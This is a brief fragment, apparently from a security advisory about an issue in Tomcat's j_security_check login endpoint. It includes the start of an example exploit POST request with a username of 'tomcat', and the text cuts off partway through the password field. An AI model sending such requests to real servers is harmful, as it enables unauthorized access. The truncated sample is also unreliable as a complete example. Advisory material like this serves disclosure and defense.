Attackers can use readily available tools to exploit this issue. The following example POST data is available: POST /j_security_check HTTP/1.1 Host: www.example.com j_username=tomcat&j_password=%